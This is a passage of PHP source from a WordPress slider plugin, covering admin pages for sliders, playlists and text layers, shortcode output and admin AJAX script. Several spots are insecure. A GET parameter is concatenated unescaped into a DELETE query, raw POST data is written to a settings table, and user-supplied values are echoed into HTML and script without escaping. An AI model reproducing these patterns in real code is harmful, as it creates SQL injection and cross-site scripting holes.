(".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);

			//playlist
			$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE bannerid = %d",$_GET['duplicate_id'] );
			$result = $wpdb->get_results($safe_sql,ARRAY_A);
			foreach ( $result as $row_playlist ) {
				$row_playlist=lbg_fullscreen_fullwidth_slider_unstrip_array($row_playlist);

				$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist ( `bannerid` ,`img` ,`thumbnail` ,`alt_text` ,`content` ,`data-video` ,`data-link` ,`data-target` ,`ord` ) SELECT ".$bannerid." ,`img` ,`thumbnail` ,`alt_text` ,`content` ,`data-video` ,`data-link` ,`data-target` ,`ord` FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE id = %d",$row_playlist['id'] );
				$wpdb->query($safe_sql);
				$photoid=$wpdb->insert_id;

				//layers/texts
				$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d",$row_playlist['id'] );
				$result_texts = $wpdb->get_results($safe_sql,ARRAY_A);
				foreach ( $result_texts as $row_texts ) {
					$row_texts=lbg_fullscreen_fullwidth_slider_unstrip_array($row_texts);

					$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts (`photoid`, `img_src`, `content`,  `data-initial-left`, `data-initial-top`, `data-final-left`, `data-final-top`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `ord`) SELECT ".$photoid.", `img_src`, `content`,  `data-initial-left`, `data-initial-top`, `data-final-left`, `data-final-top`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `ord` FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE id = %d",$row_texts['id'] );
					$wpdb->query($safe_sql);
				}
			}

	}

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners) ORDER BY id";
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/banners.php');

}


//HTML content for Manage Banners - Add New
function lbg_fullscreen_fullwidth_slider_manage_sliders_add_new_page()
{
	global $wpdb;
	global $lbg_fullscreen_fullwidth_slider_messages;
	global $lbg_fullscreen_fullwidth_slider_path;

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add New') {
		$errors_arr=array();
		if (empty($_POST['name']))
			$errors_arr[]=$lbg_fullscreen_fullwidth_slider_messages['empty_name'];

		if (count($errors_arr)) {
				include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/add_banner.php'); ?>
				<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
		  	<?php } else { // no errors
					$wpdb->insert(
						$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_banners",
						array(
							'name' => sanitize_text_field($_POST['name'])
						),
						array(
							'%s'
						)
					);
					//insert default Slider Settings for this new Slider
					lbg_fullscreen_fullwidth_slider_insert_settings_record($wpdb->insert_id);
					?>
						<div class="wrap">
							<div id="lbg_logo">
								<h2>Manage Sliders - Add New Slider</h2>
				 			</div>
							<div id="message" class="updated"><p><?php echo stripslashes($lbg_fullscreen_fullwidth_slider_messages['data_saved']);?></p><p><?php echo stripslashes($lbg_fullscreen_fullwidth_slider_messages['generate_for_this_slider']);?></p></div>
							<div>
								<p>&raquo; <a href="?page=lbg_fullscreen_fullwidth_slider_Add_New">Add New (Slider)</a></p>
								<p>&raquo; <a href="?page=lbg_fullscreen_fullwidth_slider_Manage_Sliders">Back to Manage Sliders</a></p>
							</div>
						</div>
		  	<?php }
	} else {
		include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/add_banner.php');
	}

}


//HTML content for bannersettings
function lbg_fullscreen_fullwidth_slider_settings_page()
{
	global $wpdb;
	global $lbg_fullscreen_fullwidth_slider_messages;
	global $lbg_fullscreen_fullwidth_slider_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Update Slider Settings') {
		$_GET['xmlf']='';
		$except_arr=array('Submit','name','pll_ajax_backend','page_scroll_to_id_instances','_wp_http_referer','set_key_auth','_wpnonce');

			$wpdb->update(
				$wpdb->prefix .'lbg_fullscreen_fullwidth_slider_banners',
				array(
				'name' => sanitize_text_field($_POST['name'])
				),
				array( 'id' => $_SESSION['xid'] )
			);
			$_SESSION['xname']=stripslashes($_POST['name']);


			foreach ($_POST as $key=>$val){
				if (in_array($key,$except_arr)) {
					unset($_POST[$key]);
				}
			}

			$wpdb->update(
				$wpdb->prefix .'lbg_fullscreen_fullwidth_slider_settings',
				$_POST,
				array( 'id' => $_SESSION['xid'] )
			);

			?>
			<div id="message" class="updated"><p><?php echo stripslashes($lbg_fullscreen_fullwidth_slider_messages['data_saved']);?></p></div>
	<?php

	}


	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings) WHERE id = %d",$_SESSION['xid'] );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=lbg_fullscreen_fullwidth_slider_unstrip_array($row);
	$_POST = $row;
	$_POST=lbg_fullscreen_fullwidth_slider_unstrip_array($_POST);

	include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/settings_form.php');

}

function lbg_fullscreen_fullwidth_slider_playlist_page()
{
	global $wpdb;
	global $lbg_fullscreen_fullwidth_slider_messages;
	global $lbg_fullscreen_fullwidth_slider_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	if (array_key_exists('xmlf', $_GET) && $_GET['xmlf']=='add_playlist_record') {
		if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add Record') {
			$errors_arr=array();

		if (count($errors_arr)) {
			include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/add_playlist_record.php'); ?>
			<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	  	<?php } else { // no upload errors
				$max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist WHERE bannerid = %d",$_SESSION['xid'] ) );

				$wpdb->insert(
					$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_playlist",
					array(
						'bannerid' => sanitize_text_field($_POST['bannerid']),
						'img' => sanitize_text_field($_POST['img']),
						'thumbnail' => sanitize_text_field($_POST['thumbnail']),
						'alt_text' => sanitize_text_field($_POST['alt_text']),
						'content' => $_POST['content'],
						'data-video' => sanitize_text_field($_POST['data-video']),
						'data-link' => sanitize_text_field($_POST['data-link']),
						'data-target' => sanitize_text_field($_POST['data-target']),
						'ord' => sanitize_text_field($max_ord)
					),
					array(
						'%d',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%d'
					)
				);

	  			if (isset($_POST['setitfirst'])) {
					$sql_arr=array();
					$ord_start=$max_ord;
					$ord_stop=1;
					$elem_id=$wpdb->insert_id;
					$ord_direction='+1';

					$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=ord+1  WHERE bannerid = %d and ord>=".$ord_stop." and ord<".$ord_start, $_SESSION['xid']);
					$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist SET ord=%d WHERE id=%d", $ord_stop, $elem_id);

					foreach ($sql_arr as $sql)
						$wpdb->query($sql);
				}
				?>
					<div class="wrap">
						<div id="lbg_logo">
							<h2>Playlist for Slider: <span style="color:#FF0000; font-weight:bold;"><?php echo strip_tags($_SESSION['xname'])?> - ID #<?php echo strip_tags($_SESSION['xid'])?></span> - Add New</h2>
			 			</div>
						<div id="message" class="updated"><p><?php echo stripslashes($lbg_fullscreen_fullwidth_slider_messages['data_saved']);?></p></div>
						<div>
							<p>&raquo; <a href="?page=lbg_fullscreen_fullwidth_slider_Playlist&xmlf=add_playlist_record">Add New</a></p>
							<p>&raquo; <a href="?page=lbg_fullscreen_fullwidth_slider_Playlist">Back to Playlist</a></p>
						</div>
					</div>
	  	<?php }
		} else {
			include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/add_playlist_record.php');
		}

	} else {
		if (array_key_exists('duplicate_id', $_GET) && $_GET['duplicate_id']!='') {
			$max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist WHERE bannerid = %d",$_SESSION['xid'] ) );
			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist ( `bannerid` ,`img` ,`thumbnail` ,`alt_text` ,`content` ,`data-video` ,`data-link` ,`data-target` ,`ord` ) SELECT `bannerid` ,`img` ,`thumbnail` ,`alt_text` ,`content` ,`data-video` ,`data-link` ,`data-target` ,".$max_ord." FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);
			$lastID=$wpdb->insert_id;

			$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d",$_GET['duplicate_id'] );
			$result = $wpdb->get_results($safe_sql,ARRAY_A);
			foreach ( $result as $row_playlist ) {
				$row_playlist=lbg_fullscreen_fullwidth_slider_unstrip_array($row_playlist);

				$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts (`photoid`, `img_src`, `content`,  `data-initial-left`, `data-initial-top`, `data-final-left`, `data-final-top`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `ord`) SELECT ".$lastID.", `img_src`, `content`,  `data-initial-left`, `data-initial-top`, `data-final-left`, `data-final-top`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `ord` FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE id = %d",$row_playlist['id'] );
				$wpdb->query($safe_sql);
			}

			echo "<script>location.href='?page=lbg_fullscreen_fullwidth_slider_Playlist&id=".$_SESSION['xid']."&name=".$_SESSION['xname']."'</script>";

		}

		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE bannerid = %d ORDER BY ord",$_SESSION['xid'] );
		$result = $wpdb->get_results($safe_sql,ARRAY_A);

		include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/playlist.php');
	}
}



function lbg_fullscreen_fullwidth_slider_editElements_page()
{
	global $wpdb;
	global $general_param;
	global $lbg_fullscreen_fullwidth_slider_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	if (isset($_GET['deletealllayers']) && !array_key_exists('Submit', $_POST)) {
		$wpdb->query(
		"
		DELETE FROM ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts
		WHERE photoid = ".$_GET['deletealllayers']."
		"
		);
	}

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE id = %d",$_GET['playlistID'] );
	$row = $wpdb->get_row($safe_sql, ARRAY_A);

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d ORDER BY ord",$_GET['playlistID'] );
	$result_text = $wpdb->get_results($safe_sql,ARRAY_A);

	if ((array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Save All Changes') || (array_key_exists('duplicate_layer', $_SESSION) && $_SESSION['duplicate_layer'] !=0)) {
		foreach ( $result_text as $row_text ) {
			$textid=$row_text['id'];
			$wpdb->update(
				$wpdb->prefix .'lbg_fullscreen_fullwidth_slider_texts',
				array(
					'img_src' => sanitize_text_field($_POST['img_src'.$textid]),
					'content' => sanitize_text_field($_POST['content'.$textid]),
					'css' => sanitize_text_field($_POST['css'.$textid]),
					'data-initial-left' => sanitize_text_field($_POST['data-initial-left'.$textid]),
					'data-initial-top' => sanitize_text_field($_POST['data-initial-top'.$textid]),
					'data-final-left' => sanitize_text_field($_POST['data-final-left'.$textid]),
					'data-final-top' => sanitize_text_field($_POST['data-final-top'.$textid]),
					'data-duration' => sanitize_text_field($_POST['data-duration'.$textid]),
					'data-fade-start' => sanitize_text_field($_POST['data-fade-start'.$textid]),
					'data-delay' => sanitize_text_field($_POST['data-delay'.$textid])
					),
				array( 'id' => $textid ),
				array(
'%s',
'%s',
'%s',
'%d',
'%d',
'%d',
'%d',
'%f',
'%d',
'%f'
	),
				array( '%d' )
			);
		}

			?>
	<?php
	}

	if ($_SESSION['duplicate_layer']!=0) {
		$safe_sql=$wpdb->prepare( "SELECT `photoid` , `data-final-left` , `data-final-top` FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE id = %d", $_SESSION['duplicate_layer']);
		$row_dupl = $wpdb->get_row($safe_sql,ARRAY_A);


		$new_final_left=$row_dupl['data-final-left']+10;
		$new_final_top=$row_dupl['data-final-top']+10;
		$photoid=$row_dupl['photoid'];
		$max_ord=1;

		$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts SET ord=ord+1 WHERE photoid = %d",$photoid));

		$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts (`photoid`, `img_src`, `content`,  `data-initial-left`, `data-initial-top`, `data-final-left`, `data-final-top`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `ord`) SELECT `photoid`, `img_src`, `content`,  `data-initial-left`, `data-initial-top`, ".$new_final_left.", ".$new_final_top.", `data-duration`, `data-fade-start`, `data-delay`, `css`, ".$max_ord." FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE id = %d",$_SESSION['duplicate_layer'] );
		$wpdb->query($safe_sql);
		$lastID=$wpdb->insert_id;
		$_SESSION['duplicate_layer']=0;
	}

	//get latest text parameters
	//get slider settings
	$safe_sql=$wpdb->prepare( "SELECT width,height FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings) WHERE id = %d",$_SESSION['xid'] );
	$row_settings = $wpdb->get_row($safe_sql, ARRAY_A);

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d ORDER BY ord",$_GET['playlistID'] );
	$result_text = $wpdb->get_results($safe_sql,ARRAY_A);

	$safe_sql=$wpdb->prepare( "SELECT css_styles FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions) WHERE id = %d",1);
	$row_css = $wpdb->get_row($safe_sql, ARRAY_A);

	include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/playlist_elements_over_image.php');

}




function lbg_fullscreen_fullwidth_slider_help_page()
{
	global $lbg_fullscreen_fullwidth_slider_path;
	include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/help.php');
}

function lbg_fullscreen_fullwidth_slider_generate_preview_code($sliderID) {
	global $wpdb;

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings) WHERE id = %d",$sliderID );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=lbg_fullscreen_fullwidth_slider_unstrip_array($row);

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_playlist) WHERE bannerid = %d ORDER BY ord",$sliderID );
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	$playlist_str='';
	$text_str='';
	foreach ( $result as $row_playlist ) {

		$row_playlist=lbg_fullscreen_fullwidth_slider_unstrip_array($row_playlist);

		$img_over='';
		if ($row_playlist['img']!='') {
			if (strpos($row_playlist['img'], 'wp-content',9)===false)
				list($width, $height, $type, $attr) = getimagesize($row_playlist['img']);
			else
				list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($row_playlist['img'],strpos($row_playlist['img'], 'wp-content',9)) );
			$img_over='<img src="'.$row_playlist['img'].'" width="'.$width.'" height="'.$height.'" style="width:'.$width.'px; height:'.$height.'px;" alt="'.$row_playlist['alt_text'].'" />';
		}

		//get texts
		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_texts) WHERE photoid = %d ORDER BY ord",$row_playlist['id'] );
		$result_text = $wpdb->get_results($safe_sql,ARRAY_A);
		$text_id='';
		if ($wpdb->num_rows) { // i have texts
			$text_id='#fullscreen_background_photoText'.$row_playlist['id'];


			$text_str.='<div id="fullscreen_background_photoText'.$row_playlist['id'].'" class="fullscreen_background_texts">';
			foreach ( $result_text as $row_text ) {
				$row_text=lbg_fullscreen_fullwidth_slider_unstrip_array($row_text);
				$zindex_aux=100-$row_text['ord'];
				$content_aux=$row_text['content'];
				if ($row_text['img_src']!='') {
					if (strpos($row_text['img_src'], 'wp-content',9)===false)
						list($width, $height, $type, $attr) = getimagesize($row_text['img_src']);
					else
						list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($row_text['img_src'],strpos($row_text['img_src'], 'wp-content',9)) );
					$content_aux='<img src="'.$row_text['img_src'].'" width="'.$width.'" height="'.$height.'" style="width:'.$width.'px; height:'.$height.'px; border:0;" alt="'.$row_text['content'].'" />';
				}


				$text_str.='<div class="fullscreen_background_text_line '.$row_text['css'].'" data-initial-left="'.$row_text['data-initial-left'].'" data-initial-top="'.$row_text['data-initial-top'].'" data-final-left="'.$row_text['data-final-left'].'" data-final-top="'.$row_text['data-final-top'].'" data-duration="'.$row_text['data-duration'].'" data-fade-start="'.$row_text['data-fade-start'].'" data-delay="'.$row_text['data-delay'].'" style="z-index:'.$zindex_aux.';">'.$content_aux.'</div>';
			}
			$text_str.='</div>';
		}
		$playlist_str.='<li data-text-id="'.$text_id.'" data-video="'.$row_playlist['data-video'].'" data-bottom-thumb="'.$row_playlist['thumbnail'].'" data-link="'.$row_playlist['data-link'].'" data-target="'.$row_playlist['data-target'].'" >'.$img_over.$row_playlist['content'].'</li>';

	}


	$thumbsWrapperBg_aux='';
	if ($row["thumbsWrapperBgHexa"]!='')
		$thumbsWrapperBg_aux='#'.$row["thumbsWrapperBgHexa"];
	if ($row["thumbsWrapperBgImage"]!='')
		$thumbsWrapperBg_aux=$row["thumbsWrapperBgImage"];



	return '<script>
		jQuery(function() {
			jQuery("#fullscreen_background_'.$row["id"].'").fullscreen_background({
				skin:"'.$row["skin"].'",
				responsive:true,
				responsiveRelativeToBrowser:'.((is_admin())?'false':$row["responsiveRelativeToBrowser"]).',
				width:'.$row["width"].',
				height:'.$row["height"].',
				width100Proc:true,
				height100Proc:'.$row["height100Proc"].',
				setAsBg:'.((is_admin())?'false':$row["setAsBg"]).',
				autoPlay:'.$row["autoPlay"].',
				loop:'.$row["loop"].',
				target:"'.$row["target"].'",
				fadeSlides:'.$row["fadeSlides"].',
				absUrl:"'.plugins_url("", __FILE__).'/fulscreen_background/",
				texturePath:"'.$row["texturePath"].'",
				pauseOnMouseOver:'.$row["pauseOnMouseOver"].',
				enableTouchScreen:'.$row["enableTouchScreen"].',
				showAllControllers:'.$row["showAllControllers"].',
				showNavArrows:'.$row["showNavArrows"].',
				showOnInitNavArrows:'.$row["showOnInitNavArrows"].',
				autoHideNavArrows:'.$row["autoHideNavArrows"].',
				showBottomNav:'.$row["showBottomNav"].',
				showOnInitBottomNav:'.$row["showOnInitBottomNav"].',
				autoHideBottomNav:'.$row["autoHideBottomNav"].',
				showPreviewThumbs:'.$row["showPreviewThumbs"].',
				numberOfThumbsPerScreen:'.$row["numberOfThumbsPerScreen"].',
				thumbsWrapperMarginTop:'.$row["thumbsWrapperMarginTop"].',
				bottomNavPos:"'.$row["bottomNavPos"].'",
				bottomNavLateralMargin:'.$row["bottomNavLateralMargin"].',
				thumbsWrapperBg:"'.$thumbsWrapperBg_aux.'",
				thumbsBorderColorON:"#'.$row["thumbsBorderColorON"].'",
				thumbsBorderColorOFF:"#'.$row["thumbsBorderColorOFF"].'",
				videoProportionWidth:'.$row["videoProportionWidth"].',
				showCircleTimer:'.$row["showCircleTimer"].',
				showCircleTimerIE8IE7:false,
				circleRadius:'.$row["circleRadius"].',
				circleLineWidth:'.$row["circleLineWidth"].',
				circleColor:"#'.$row["circleColor"].'",
				circleAlpha:'.$row["circleAlpha"].',
				behindCircleColor:"#'.$row["behindCircleColor"].'",
				behindCircleAlpha:'.$row["behindCircleAlpha"].'
			});
		});
	</script>
            <div id="fullscreen_background_'.$row["id"].'"><div class="myloader"></div><ul class="fullscreen_background_list">'.$playlist_str.'</ul>'.$text_str.'</div>';
}


function lbg_fullscreen_fullwidth_slider_shortcode($atts, $content=null) {
	global $wpdb;

	shortcode_atts( array('settings_id'=>''), $atts);
	if ($atts['settings_id']=='')
		$atts['settings_id']=1;

	return lbg_fullscreen_fullwidth_slider_generate_preview_code($atts['settings_id']);

}


function lbg_fullscreen_fullwidth_slider_add_meta_box() {

	$screens = array( 'post', 'page' );

	foreach ( $screens as $screen ) {

		add_meta_box(
			'lbg_fullscreen_fullwidth_slider_sectionid',
			__( 'Page Background Selection', 'lbg_fullscreen_fullwidth_slider_textdomain' ),
			'lbg_fullscreen_fullwidth_slider_meta_box_callback',
			$screen
		);
	}
}
add_action( 'add_meta_boxes', 'lbg_fullscreen_fullwidth_slider_add_meta_box' );


register_activation_hook(__FILE__,"lbg_fullscreen_fullwidth_slider_activate"); //activate plugin and create the database
add_action('init', 'lbg_fullscreen_fullwidth_slider_init_sessions');	// initialize sessions
add_action('init', 'lbg_fullscreen_fullwidth_slider_load_styles');	// loads required styles
add_action('init', 'lbg_fullscreen_fullwidth_slider_load_scripts');			// loads required scripts
add_action('admin_menu', 'lbg_fullscreen_fullwidth_slider_plugin_menu'); // create menus
add_shortcode('lbg_fullscreen_fullwidth_slider', 'lbg_fullscreen_fullwidth_slider_shortcode');				// LBG_FULLSCREEN_FULLWIDTH_SLIDER shortcode



/**
 * Prints the box content.
 *
 * @param WP_Post $post The object for the current post/page.
 */
function lbg_fullscreen_fullwidth_slider_meta_box_callback( $post ) {

	// Add an nonce field so we can check for it later.
	wp_nonce_field( 'lbg_fullscreen_fullwidth_slider_meta_box', 'lbg_fullscreen_fullwidth_slider_meta_box_nonce' );

	/*
	 * Use get_post_meta() to retrieve an existing value
	 * from the database and use the value for the form.
	 */
	$value = get_post_meta( $post->ID, 'lbg_fullscreen_fullwidth_slider_my_meta_value_key', true );

	echo '<label for="lbg_fullscreen_fullwidth_slider_page_shortcode">';
	_e( 'Add Shortcode Here: ', 'lbg_fullscreen_fullwidth_slider_textdomain' );
	echo '</label> ';
	echo '<input type="text" id="lbg_fullscreen_fullwidth_slider_page_shortcode" name="lbg_fullscreen_fullwidth_slider_page_shortcode" value="' . esc_attr( $value ) . '" size="50" />';
}


/**
 * When the post is saved, saves our custom data.
 *
 * @param int $post_id The ID of the post being saved.
 */
function lbg_fullscreen_fullwidth_slider_save_meta_box_data( $post_id ) {

	/*
	 * We need to verify this came from our screen and with proper authorization,
	 * because the save_post action can be triggered at other times.
	 */

	// Check if our nonce is set.
	if ( ! isset( $_POST['lbg_fullscreen_fullwidth_slider_meta_box_nonce'] ) ) {
		return;
	}

	// Verify that the nonce is valid.
	if ( ! wp_verify_nonce( $_POST['lbg_fullscreen_fullwidth_slider_meta_box_nonce'], 'lbg_fullscreen_fullwidth_slider_meta_box' ) ) {
		return;
	}

	// If this is an autosave, our form has not been submitted, so we don't want to do anything.
	if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
		return;
	}

	// Check the user's permissions.
	if ( isset( $_POST['post_type'] ) && 'page' == $_POST['post_type'] ) {

		if ( ! current_user_can( 'edit_page', $post_id ) ) {
			return;
		}

	} else {

		if ( ! current_user_can( 'edit_post', $post_id ) ) {
			return;
		}
	}

	/* OK, it's safe for us to save the data now. */

	// Make sure that it is set.
	if ( ! isset( $_POST['lbg_fullscreen_fullwidth_slider_page_shortcode'] ) ) {
		return;
	}

	// Sanitize user input.
	$my_data = sanitize_text_field( $_POST['lbg_fullscreen_fullwidth_slider_page_shortcode'] );

	// Update the meta field in the database.
	update_post_meta( $post_id, 'lbg_fullscreen_fullwidth_slider_my_meta_value_key', $my_data );
}
add_action( 'save_post', 'lbg_fullscreen_fullwidth_slider_save_meta_box_data' );



function lbg_fullscreen_fullwidth_slider_add_background() {
	global $post;
	$my_meta = get_post_meta($post->ID,'lbg_fullscreen_fullwidth_slider_my_meta_value_key',TRUE);
	if ($my_meta) {
		echo do_shortcode($my_meta);
	}
}
add_action( 'wp_head','lbg_fullscreen_fullwidth_slider_add_background' );



/** OTHER FUNCTIONS **/

//stripslashes for an entire array
function lbg_fullscreen_fullwidth_slider_unstrip_array($array){
	if (is_array($array)) {
		foreach($array as &$val){
			if(is_array($val)){
				$val = unstrip_array($val);
			} else {
				$val = stripslashes($val);

			}
		}
	}
	return $array;
}


function lbg_fullscreen_fullwidth_slider_getCssStyles($currentCssClass,$id,$div_data){
	global $wpdb;

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions) LIMIT 0, 1";
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$temp_class='';
	$classes_arr=array();
	$startPos=0;
	$endPos=0;
	$endClassContentPos=0;

	$startPos=strpos($row['css_styles'],'.',$startPos);
	$endPos=strpos($row['css_styles'],'{',$startPos);
	while ($startPos!==FALSE) {
		$temp_class=trim(substr($row['css_styles'],$startPos+1,$endPos-1-$startPos));
		if (strpos($temp_class,' a')===FALSE)
			$classes_arr[]=$temp_class;
		$endClassContentPos=strpos($row['css_styles'],'}',$endPos);
		$startPos=strpos($row['css_styles'],'.',$endClassContentPos);
		$endPos=strpos($row['css_styles'],'{',$startPos);
	}
	$div_data_end="";
	if ($div_data!='')
		$div_data_end="';";

	?>
    <?php echo stripslashes($div_data);?><select name="css<?php echo esc_attr($id);?>" id="css<?php echo esc_attr($id);?>"  onchange="change_text_div_css_class(<?php echo esc_js($id);?>,this)"><?php echo stripslashes($div_data_end);?>
    <?php
		foreach ($classes_arr as $class_elem) {
	?>
              <?php echo stripslashes($div_data);?><option value="<?php echo esc_attr($class_elem);?>" <?php echo (($class_elem==$currentCssClass)?'selected="selected"':'')?>><?php echo esc_html($class_elem);?></option><?php echo stripslashes($div_data_end);?>
    <?php
		}
	?>
            <?php echo stripslashes($div_data);?></select><?php echo stripslashes($div_data_end);?>
<?php }




/* ajax update playlist record */

add_action('admin_head', 'lbg_fullscreen_fullwidth_slider_update_playlist_record_javascript');

function lbg_fullscreen_fullwidth_slider_update_playlist_record_javascript() {
	global $wpdb;
	global $general_param;
	//Set Your Nonce
	$lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_update_playlist_record-special-string");
	$lbg_fullscreen_fullwidth_slider_add_text_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_add_text_record-special-string");
	$lbg_fullscreen_fullwidth_slider_delete_text_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_delete_text_record-special-string");
	$lbg_fullscreen_fullwidth_slider_edit_css_classes_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_edit_css_classes_record-special-string");
	$lbg_fullscreen_fullwidth_slider_preview_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_preview_record-special-string");
	$lbg_fullscreen_fullwidth_slider_duplicate_record_ajax_nonce = wp_create_nonce("lbg_fullscreen_fullwidth_slider_duplicate_record-special-string");

	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) {
		$page = (isset($_GET['page'])) ? $_GET['page'] : '';
		if(preg_match('/lbg_fullscreen_fullwidth_slider/i', $page)) {
?>




<script type="text/javascript" >

//delete the entire record
function lbg_fullscreen_fullwidth_slider_delete_entire_record (delete_id) {
	if (confirm('Are you sure?')) {
		jQuery("#lbg_fullscreen_fullwidth_slider_sortable").sortable('disable');
		jQuery("#"+delete_id).css("display","none");
		jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","block");
		var data = "action=lbg_fullscreen_fullwidth_slider_update_playlist_record&security=<?php echo esc_js($lbg_fullscreen_fullwidth_slider_update_playlist_record_ajax_nonce); ?>&updateType=lbg_fullscreen_fullwidth_slider_delete_entire_record&delete_id="+delete_id;
		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			jQuery("#lbg_fullscreen_fullwidth_slider_sortable").sortable('enable');
			jQuery("#lbg_fullscreen_fullwidth_slider_updating_witness").css("display","none");
		});
	}
}


function lbg_fullscreen_fullwidth_slider_add_text_line_CONTENT(textID,maxORD,photoid,img_src) {

		newZindex=100-maxORD;

		if (img_src=='') {
			content_aux='TEXT HERE '+(jQuery('#lbg_fullscreen_fullwidth_slider_layers_sortable').children().size()+1);
			content_title='HTML Content';
			image_path='';
			draggable_aux=content_aux;
